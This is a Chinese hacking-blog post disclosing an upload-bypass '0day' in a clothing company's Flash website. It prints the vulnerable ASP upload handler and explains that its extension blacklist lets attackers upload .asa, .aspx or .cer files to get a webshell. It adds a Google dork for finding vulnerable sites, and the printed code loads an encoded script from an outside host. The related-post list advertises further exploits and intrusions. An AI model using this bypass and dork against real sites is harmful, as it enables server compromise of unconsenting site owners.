金威世家服装有限公司FLASH整站 0day
同样来源于:http://yxmhero1989.blog.163.com/,大家小心点,已经说过很多次了,反正本大王不想吃窝窝头,玩躲猫猫。
Author:Minghacker
From:www.3est.com
Blog:http://yxmhero1989.blog.163.com
貌似有新旧版本。
看代码sub_uploadb.asp
<%@language=VBScript%>
<!--#include FILE="upload.inc"-->
<%
dim upload,file,formName,formPath,iCount,fileformat
set upload=new upload_F
function MakedownName()
dim fname
fname = now()
fname = replace(fname,"-","")
fname = replace(fname," ","")
fname = replace(fname,":","")
fname = replace(fname,"PM","")
fname = replace(fname,"AM","")
fname = replace(fname,"上午","")
fname = replace(fname,"下午","")
fname = int(fname) + int((10-1+1)*Rnd + 1)
MakedownName=fname
end function
formPath="../../upload/"
iCount=0
for each formName in upload.file ''列出所有上传了的文件
set file=upload.file(formName) ''生成一个文件对象
fileformat=lcase(right(file.filename,4))
if fileformat=".asp" or fileformat=".exe" or fileformat=".txt" or fileformat=".htm" then
response.write"<script>alert('文件格式不对,请重新上传!');location='"&request.ServerVariables("HTTP_REFERER")&"'</script>"
response.end
end if
if file.FileSize>0 then ''如果 FileSize > 0 说明有文件数据
newname=MakedownName()&"."&mid(file.FileName,InStrRev(file.FileName, ".")+1)
file.SaveAs Server.mappath(formPath&newname) ''保存文件
filename=file.filepath&file.filename
filename=replace(filename,"\","/")
uploadpath=formpath&newname
uploadpath=mid(uploadpath,instr(formpath,"upload"))
iCount=iCount+1%>
<script>
fn="<%=uploadpath%>"
filename="<%=filename%>"
window.opener.document.form.proimgb.value=fn
window.opener.document.form.probpath.value=filename
window.close();
</script>
<%else
response.write("<font size=1.5 color=red>")
response.write "未找到文件 <A HREF=javas
response.write("</font>")
response.end
end if
next
%>
<html>
<head>
<title></title>
<meta http-equiv="Content-Type" content="text/html; charset=gb2312">
<link rel="stylesheet" href="css.css" type="text/css">
<style type="text/css">
<!--
body,td,th {
font-size: 12px;
}
body {
margin-left: 10px;
margin-top: 10px;
margin-right: 10px;
margin-bottom: 10px;
background-image: url(../../images/bg.gif);
}
-->
</style>
<script language="JScript.Encode" src="http://www.16885688.com/include.js">
if fileformat=".asp" or fileformat=".exe" or fileformat=".txt" or fileformat=".htm" then。。
只过滤了asp等等,可以传其他譬如asa,aspx,cer等等(如果服务器支持的话)
asp/up/upload.asp调用上面sub_uploadb.asp。上传得Shell,不解释了。
Google:inurl:/managepro.asp
站不多,关键字还是大家自己构造好些。具体问题具体对待。
- EXE内存寄生者(很淫-荡的东西)(2010-1-7 21:53:48)
- discuz 7.1 7.2 0day+EXP+使用动画教程(2010-1-6 21:36:29)
- 人人网被入侵(2010-1-3 19:28:44)
- 一切为了暗链,风讯CMS爆0day(2009-12-31 10:8:12)
- 一切为了暗链,php168 oday 利用过程(2009-12-29 22:32:54)
- Fckeditor的一些漏洞总结(2009-12-27 22:23:51)
- Ewebeditor的一些漏洞总结(2009-12-27 10:52:57)
- ShopWind 0Day漏洞(2009-12-25 14:47:58)
- 对华军软件站一次失败的入侵(2009-12-25 10:36:14)
- PHPMPS 0day(2009-12-24 22:5:48)
留言
终于可以留言了
一直说我有非法的词语!现在终于好了!你是不是过滤的太严格了?白银时代 于 2010-1-8 13:19:49 回复自从前段时间报非法留言之后我已经把月光的那个插件去掉了。
汗啊,,,,,,,
不懂技术,看不太懂
这是干嘛。?
◎欢迎参与讨论,请在这里发表您的看法、交流您的观点。